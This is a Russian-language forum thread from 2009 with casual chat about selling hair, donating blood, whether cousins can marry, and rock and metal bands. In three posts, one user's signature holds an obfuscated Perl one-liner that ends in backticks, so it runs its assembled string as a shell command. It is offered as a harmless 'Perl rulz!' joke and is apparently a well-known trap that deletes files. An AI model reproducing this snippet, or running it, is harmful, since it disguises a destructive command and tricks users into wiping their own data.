А нужен сперманоситель, так что...
Кстати волосы самый нормальный способ, за кг у нас года 2 назад давали 7 косарей(так было написано на афише), а в Томске 10 косарей.
Цитата:
получается что у меня что у моих потомков увеличивается вероятность инцеста и смешения крови
Это маловероятно)
Например троюродным братьям и сёстрам можно создавать семью, заниматься сексом, последствий от родственной связи не будет. А про детей, тут да, серьёзный вопрос, хотя мне было бы похуй наверно.
у меня вчера как раз кровь брали
сказали, что вены некрасивые(их не видно почти)
и кровь слишком густая
кому такая нужна) _________________ Freedom's just another word for nothin' left to lose.
Я,вроде,читал,что не ближе пятого колена. _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
Добавлено: Ср Апр 22, 2009 10:17 am Заголовок сообщения:
а я ешо слушаю Metallica, Nightwish, Rage, Sum41...вот так))))))и ешо много ерунды(перечислять лень, да и исполнителей не наю ) _________________ "Да я бы сдохла с радостью! Только, вот, радости от этого не будет никакой..."(с)
Мне страшно употреблять одно это название,но вы в курсе,что у Napalm Death вышел новый альбом? _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
Добавлено: Пн Май 04, 2009 12:59 am Заголовок сообщения:
название слышал
еще слышал кавер ричарда чиза на одну из песен
все, собстно _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Добавлено: Пн Май 04, 2009 1:02 am Заголовок сообщения:
Цитата:
Слушатели были покорены великолепным яростным вокалом Рота и виртуозной гитарной техникой Эдди Ван Халена. Последнего мгновенно провозгласили "наследником" Ричи Блэкмора. Действительно, именно Ван Хален стал наиболее ярким продолжателем дела Хендрикса, Блэкмора и Фриппа, открыв дорогу ко всеобщему признанию таким гитаристам-виртуозам, как Ингви Мальмстин, Джо Сатриани и Стив Вай.
Добавлено: Пн Май 04, 2009 1:36 am Заголовок сообщения:
Вай вроде еще с Заппой же прославился
не важно
The Mars Volta кому-нить знакомы? _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
Добавлено: Ср Май 20, 2009 12:51 am Заголовок сообщения:
Sandra
о группе слышал, саму группу нет, скачать некогда _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!